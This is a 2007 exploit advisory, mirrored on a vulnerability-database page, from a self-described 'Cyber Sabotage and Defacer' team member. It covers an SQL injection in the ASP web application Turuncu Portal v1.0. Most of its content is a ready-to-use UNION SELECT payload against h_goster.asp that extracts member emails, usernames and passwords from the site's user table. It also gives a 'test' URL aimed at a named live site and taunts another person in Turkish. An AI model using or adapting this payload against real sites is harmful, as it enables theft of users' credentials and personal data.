Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16096
HistoryFeb 16, 2007 - 12:00 a.m.

Turuncu Portal v1.0 == SQL Injection Vulnerability

2007-02-1600:00:00
vulners.com
219

###############################################################
#Turuncu Portal v1.0 == SQL Injection Vulnerability
#Author : chernobiLe
#Site : www.cyber-sabotage.org, www.chernobiLe.net<http://www.chernobile.net/&gt;
#Contact: [email protected]
#Not;
#Bana Türk Scriptinde Açýk Buluyorsun diyen eleman; akýllý ol sen bana Türk
scriptidir
#yapma dedin eywallah dedim. Artislik yapmak için kendini küçük düþürüp
lamerlik yaptýn.
#AYTdeki deðerli dostlarým için konuyu uzatmýyorum. Karþýma çýkmayýn
###############################################################
#Risk : High
#Download Link Of Turuncu Portal v1.0 :
http://aspindir.com/indir.asp?ID=4714 OR

http://www.aspdunyasi.net/download_goster.asp?ITEM_ID=56
#Exploit;
#Username, Passport, Mail;
http://[SITE]/h_goster.asp?id=1+union+select+0,MsEmail,MsUserName,MsPassword,4+from+uyeler<http://[site]/h_goster.asp?id=1+union+select+0,MsEmail,MsUserName,MsPassword,4+from+uyeler>

#Union data Text;
#Baþlýk : USERNAME
#Blank : MAIL
#Yazar : PASSWORD

#Test :
http://www.aspdunyasi.net/h_goster.asp?id=1+union+select+0,MsEmail,MsUserName,MsPassword,4+from+uyeler

#Greetz: All CSDT ( Cyber Sabotage and Defacer ) TEAM